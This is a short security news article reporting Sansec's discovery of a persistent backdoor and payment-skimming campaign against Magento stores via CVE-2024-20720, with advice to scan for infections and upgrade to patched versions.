Stealthy XML Backdoor Haunts Magento Stores – New Threat Exploits Critical Vulnerability (CVE-2024-20720)

CVE-2024-20720

Magento merchants, brace yourselves. A cunning new malware campaign is targeting your online stores with an insidious twist. Researchers at Sansec have uncovered a persistent backdoor lurking within the XML code of Magento websites, a method designed to ensure the infection keeps returning even after you think you’ve cleaned up.

The Sneaky Exploit

Attackers are ruthlessly exploiting a recently patched critical vulnerability (CVE-2024-20720) in Magento. They’re injecting malicious code into a layout template tucked away in your store’s database. This crafty layout template uses the Magento layout system and a commonly installed package to secretly execute attacker-controlled commands.

The worst part? This attack is linked to your checkout page. Every time a customer visits their shopping cart, the malware triggers. It reinfects a vital system controller, guaranteeing its unwelcome return.

A Two-Pronged Attack

This isn’t just about persistence. These cybercriminals have a double whammy in store:

  1. Persistent Backdoor: They get unfettered remote control of your website. Think of it as a secret entrance they can use to slip in and out at will.
  2. Stolen Payment Data: The attackers are siphoning off sensitive customer payment details using a fake Stripe payment form. They’re sending this stolen data off to a different compromised Magento store.

What You Need to Do – NOW

Affected merchants, there’s no time to waste. Here’s your action plan:

  1. Scan and Seek: Use Sansec’s eComscan scanner to hunt down any hidden backdoors lurking in your system.
  2. Patch Immediately: Upgrade your Magento installation to the latest secured versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to slam the door shut on this vulnerability.

The Bigger Picture

This attack is a chilling reminder of the relentless threat landscape online stores face. Staying vigilant, keeping software up-to-date, and using specialized security tools are your best weapons in this ongoing battle.